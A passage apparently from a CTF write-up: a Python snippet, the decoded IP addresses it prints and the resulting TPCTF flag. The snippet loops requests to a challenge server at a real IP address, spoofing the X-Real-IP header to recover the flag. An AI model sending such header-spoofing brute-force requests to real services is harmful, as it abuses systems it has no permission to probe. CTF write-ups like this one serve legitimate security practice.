    for i in range(255):
        t=s.get('http://1.95.184.40:8520',headers={'X-Real-IP':int_to_ip(bb+103*aa+103*513*cc+103*513*313*i)})
        m=t.text
        w=m.find('Post a Message')
        # print(m[w+60:w+60+12])
        if m[w+60:w+60+12]==j:
            print(int_to_ip(bb+103*aa+103*513*cc+103*513*313*i))
            for k in int_to_ip(bb+103*aa+103*513*cc+103*513*313*i).split('.'):
                flag+=chr(int(k))
print(flag)
84.80.67.84
70.123.102.105
110.97.108.108
121.95.116.104
101.95.99.114
105.109.105.110
97.108.53.95
119.104.48.95
112.117.98.108
105.53.104.101
100.95.116.104
101.53.101.95
53.112.97.109
95.119.101.114
101.95.97.114
114.101.53.116
101.100.125.32
TPCTF{finally_the_criminal5_wh0_publi5hed_the5e_5pam_were_arre5ted}

comment

留言 / 评论

如果暂时没有看到评论,请点击下方按钮重新加载。